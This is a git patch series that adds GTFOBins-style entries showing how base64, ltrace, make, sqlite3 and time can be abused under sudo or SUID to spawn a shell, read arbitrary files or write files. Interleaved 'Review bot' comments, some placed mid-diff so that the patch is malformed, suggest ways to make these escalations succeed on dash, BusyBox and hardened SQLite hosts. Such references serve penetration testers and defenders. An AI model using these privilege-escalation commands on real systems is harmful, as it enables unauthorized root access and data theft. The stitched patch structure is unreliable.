From 5fa7efbc1c23b11b8c5bc811357a5bd830eafa99 Mon Sep 17 00:00:00 2001
From: Dov Murik
Date: Mon, 4 Jun 2018 10:21:53 +0000
Subject: [PATCH 1/6] Add base64, ltrace, make, sqlite3, time
---
 _gtfobins/base64.md | 15 +++++++++++++++
 _gtfobins/ltrace.md | 7 +++++++
 _gtfobins/make.md | 23 +++++++++++++++++++++++
 _gtfobins/sqlite3.md | 27 +++++++++++++++++++++++++++
 _gtfobins/time.md | 12 ++++++++++++
 5 files changed, 84 insertions(+)
 create mode 100644 _gtfobins/base64.md
 create mode 100644 _gtfobins/ltrace.md
 create mode 100644 _gtfobins/make.md
 create mode 100644 _gtfobins/sqlite3.md
 create mode 100644 _gtfobins/time.md
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
new file mode 100644
index 0000000..02e4f62
--- /dev/null
+++ b/_gtfobins/base64.md
@@ -0,0 +1,15 @@
+---
+functions:
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo base64 "$LFILE" | base64 -d
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./base64 "$LFILE" | base64 -d
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ base64 "$LFILE" | base64 -d
+---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
new file mode 100644
index 0000000..f7b420b
--- /dev/null
+++ b/_gtfobins/ltrace.md
@@ -0,0 +1,7 @@
+---
+functions:
+ execute-interactive:
+ - code: ltrace -b -L /bin/sh
+ sudo-enabled:
+ - code: sudo ltrace -b -L /bin/sh
+---
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
new file mode 100644
index 0000000..fb38728
--- /dev/null
+++ b/_gtfobins/make.md
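Review bot: The ltrace entry has no description, so a reader has to look up why `-b -L` is passed; as far as I can tell `-b` (`--no-signals`) stops ltrace from printing the signals delivered to the traced shell and `-L` suppresses the library-call listing, so together they only keep the trace from cluttering the interactive session. I would add a front-matter description such as `The -b and -L flags only silence the trace output; the spawned shell is not affected.` so nobody mistakes them for part of the privilege trick. The sudo variant inherits the same flags and the same explanation.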
@@ -0,0 +1,23 @@
+---
+functions:
+ execute-interactive:
+ - code: |
+ COMMAND='/bin/sh 1>&2'
+ make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ execute-non-interactive:
+ - code: |
+ COMMAND=/usr/bin/id
+ make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ sudo-enabled:
+ - code: |
+ COMMAND=/usr/bin/id
+ sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ suid-enabled:
+ - code: |
+ COMMAND=/usr/bin/id
+ ./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
+---
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
new file mode 100644
index 0000000..6fa89ae
--- /dev/null
+++ b/_gtfobins/sqlite3.md
@@ -0,0 +1,27 @@
+---
+functions:
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ sqlite3 << EOF
+ CREATE TABLE t(line TEXT);
+ .import $LFILE t
+ SELECT * FROM t;
+ EOF
+---
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
new file mode 100644
index 0000000..7530795
--- /dev/null
+++ b/_gtfobins/time.md
@@ -0,0 +1,12 @@
+---
+description: |
+ Note that the shell might have its own builtin time implementation, which may
+ behave differently than /usr/bin/time.
+functions:
+ execute-interactive:
+ - code: /usr/bin/time /bin/sh
+ sudo-enabled:
+ - code: sudo /usr/bin/time /bin/sh
+ suid-enabled:
+ - code: ./time /bin/sh -p
+---
From 323553f4b09e0ea1ce22aef0cc95677cd8f961d1 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 4 Jun 2018 14:59:57 +0200
Subject: [PATCH 2/6] Make base64 portable
---
 _gtfobins/base64.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
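Review bot: The `.import $LFILE t` read in all three sqlite3 examples is lossy for files whose lines contain the shell's current column separator, because `.import` splits every line on it (`|` in the default list mode) and a one-column table cannot take the extra fields; depending on the sqlite3 version the surplus is discarded or the row is rejected with an "expected 1 columns" error, so parts of the target file silently never show up in `SELECT * FROM t`. Adding a `.separator` line that picks a byte unlikely to occur in the file, or at least a description stating the limitation, would make the primitive dependable for arbitrary text. The unquoted `EOF` delimiter is what lets `$LFILE` expand inside the heredoc, which is intended here, but note that it also lets the calling shell interpret any `$` or backtick in the path.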
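Review bot: The `suid-enabled` example `./time /bin/sh -p` needs `-p` so that bash keeps the effective uid instead of resetting it to the real uid, but `-p` is not a POSIX `sh` option: dash, which is `/bin/sh` on Debian-derived systems, rejects it with `Illegal option -p`, so whether the entry works depends entirely on what `/bin/sh` resolves to on the target. A description line such as `The -p flag keeps the SUID privileges in bash; use /bin/bash -p when /bin/sh is dash.` would spare the reader a failed attempt. The interactive and sudo variants are unaffected since no euid/ruid mismatch is involved there.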
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
index 02e4f62..2dd7844 100644
--- a/_gtfobins/base64.md
+++ b/_gtfobins/base64.md
@@ -3,13 +3,13 @@ functions:
 sudo-enabled:
 - code: |
 LFILE=file_to_read
- sudo base64 "$LFILE" | base64 -d
+ sudo base64 "$LFILE" | base64 --decode
 suid-enabled:
 - code: |
 LFILE=file_to_read
- ./base64 "$LFILE" | base64 -d
+ ./base64 "$LFILE" | base64 --decode
 file-read:
 - code: |
 LFILE=file_to_read
- base64 "$LFILE" | base64 -d
+ base64 "$LFILE" | base64 --decode
 ---
From b2a2dccc82495deb8c3345d58cd9d969622d1d79 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 4 Jun 2018 17:16:57 +0200
Subject: [PATCH 3/6] Add execute-interactive to sqlite3
---
 _gtfobins/sqlite3.md | 22 ++++++++--------------
 1 file changed, 8 insertions(+), 14 deletions(-)
diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md
index 6fa89ae..f9ad23f 100644
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@@ -1,21 +1,15 @@
 ---
 functions:
+ execute-interactive:
+ - code: sqlite3 /dev/null '.shell /bin/sh'
 sudo-enabled:
+ - code: sudo sqlite3 /dev/null '.shell /bin/sh'
+ suid-limited:
+ - code: ./sqlite3 /dev/null '.shell /bin/sh'
+ file-write:
 - code: |
- LFILE=file_to_read
- sudo sqlite3 << EOF
- CREATE TABLE t(line TEXT);
- .import $LFILE t
- SELECT * FROM t;
- EOF
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./sqlite3 << EOF
- CREATE TABLE t(line TEXT);
- .import $LFILE t
- SELECT * FROM t;
- EOF
+ LFILE=file_to_write
+ sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
 file-read:
 - code: |
 LFILE=file_to_read
From 4eff8b534fcded537ffd57dcd86af58ade708205 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 4 Jun 2018 17:21:24 +0200
Subject: [PATCH 4/6] Fix time description
---
 _gtfobins/time.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
index 7530795..91c6290 100644
--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
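Review bot: The switch from `-d` to `--decode` on the unprivileged decode side is labelled a portability fix, but it only widens compatibility among implementations that take long options; BusyBox's `base64`, a common sight on embedded and minimal targets, accepts `-d` only as far as I know, so the change trades one incompatibility for another. GNU coreutils understands both spellings, so either is fine there, but the entry should say which one it assumes, e.g. a description `Use -d instead of --decode if the local base64 is BusyBox.`. The decode step runs with the caller's own privileges, so any other local decoder can stand in for it when the target's base64 is limited; the privileged read is the only part that has to be this binary.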
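Review bot: The new `file-write` example depends on `select "data"` being accepted as a string literal, which only works through SQLite's double-quoted-string fallback; builds compiled with `SQLITE_DQS=0`, which the SQLite authors recommend for new deployments, reject it with `no such column: data`, so the write fails on precisely the hardened hosts the entry is meant for. A single-quoted SQL string has no such dependency: `sqlite3 /dev/null -cmd ".output $LFILE" "select 'data';"`. The `.shell` examples go through `system()`, i.e. `/bin/sh -c`, which is presumably why the SUID case is filed under `suid-limited`; one sentence in a description saying so would stop readers from trying to bolt `-p` onto the inner shell.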
@@ -1,7 +1,7 @@
 ---
 description: |
 Note that the shell might have its own builtin time implementation, which may
- behave differently than /usr/bin/time.
+ behave differently than` /usr/bin/time`, hence the absolute path.
 functions:
 execute-interactive:
 - code: /usr/bin/time /bin/sh
From c31a8a1b6b5338d570f5a4a034c4f3b385dceda9 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 4 Jun 2018 18:28:58 +0200
Subject: [PATCH 5/6] Simplify make
---
 _gtfobins/make.md | 18 +++++++-----------
 1 file changed, 7 insertions(+), 11 deletions(-)
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index fb38728..1dc4451 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -2,22 +2,18 @@
 functions:
 execute-interactive:
 - code: |
- COMMAND='/bin/sh 1>&2'
- make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
- execute-non-interactive:
- - code: |
- COMMAND=/usr/bin/id
- make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ COMMAND='/bin/sh'
+ make -s --eval=$'x:\n\t-'"$COMMAND"
 sudo-enabled:
 - code: |
- COMMAND=/usr/bin/id
- sudo make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ COMMAND='/bin/sh'
+ sudo make -s --eval=$'x:\n\t-'"$COMMAND"
 suid-enabled:
 - code: |
- COMMAND=/usr/bin/id
- ./make -s --eval="a := \$(info \$(shell $COMMAND))" --eval='all:'
+ COMMAND='/bin/sh'
+ ./make -s --eval=$'x:\n\t-'"$COMMAND"
 file-write:
 - code: |
 LFILE=file_to_write
- make -s --eval="a := \$(file >$LFILE,data)" --eval='all:'
+ make -s --eval="\$(file >$LFILE,data)" .
 ---
From 81f12399fe5c9c524c24c14891432181a87354e4 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Mon, 4 Jun 2018 18:59:07 +0200
Subject: [PATCH 6/6] Add compatibility notice in make
---
 _gtfobins/make.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index 1dc4451..c5ab66a 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
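Review bot: The reworded description line has its opening backtick on the wrong side of the space, so the rendered text shows a stray backtick after "than" and the path is not set in code. It should read: behave differently than `/usr/bin/time`, hence the absolute path. The rest of the description is fine and the "hence the absolute path" clause is a useful addition.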
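Review bot: The new recipe injection `--eval=$'x:\n\t-'"$COMMAND"` relies on `$'...'` ANSI-C quoting to produce the literal tab that make requires in front of a recipe line, and that quoting is a bash/ksh/zsh extension: in dash or another POSIX `sh` the argument becomes the literal `$x:\n\t-/bin/sh`, so all three entries fail from exactly the restricted shells one tends to land in. A shell-agnostic equivalent feeds the makefile through stdin, `printf 'x:\n\t-%s\n' "$COMMAND" | make -s -f -` (prefix `sudo` or use `./make` for the other variants), since `printf` interprets `\t` in its format in every POSIX shell. The `--eval` form can stay as the primary example, but the front matter should state which shell it assumes.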
@@ -1,4 +1,18 @@
 ---
+description: |
+ All these examples only work with GNU `make` due to the lack of support of the
+ `--eval` flag. The same can be achieved by using a proper `Makefile` of by
+ passing the content via stdin, that is:
+
+ ```
+ make -s --eval=
+ ```
+
+ becomes:
+
+ ```
+ make -s -f <(echo )
+ ```
 functions:
 execute-interactive:
 - code: |
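Review bot: The compatibility notice pins the GNU-only requirement on `--eval` alone, but the `file-write` entry also uses the `$(file ...)` function, which only exists in GNU make 4.0 and later, so that example fails on the 3.81/3.82 builds still shipped by older distributions; a clause such as `the file-write example additionally requires GNU make 4.0 or newer for $(file ...)` would keep the notice accurate. The two fenced commands appear to have lost their placeholder (`make -s --eval=` and `make -s -f <(echo )` end abruptly, presumably a stripped angle-bracket token), and `<(echo ...)` is itself bash process substitution rather than POSIX, so the suggested fallback is no more portable than the `--eval` form; piping into `make -s -f -` is the portable spelling. Also "of by passing" should read "or by passing".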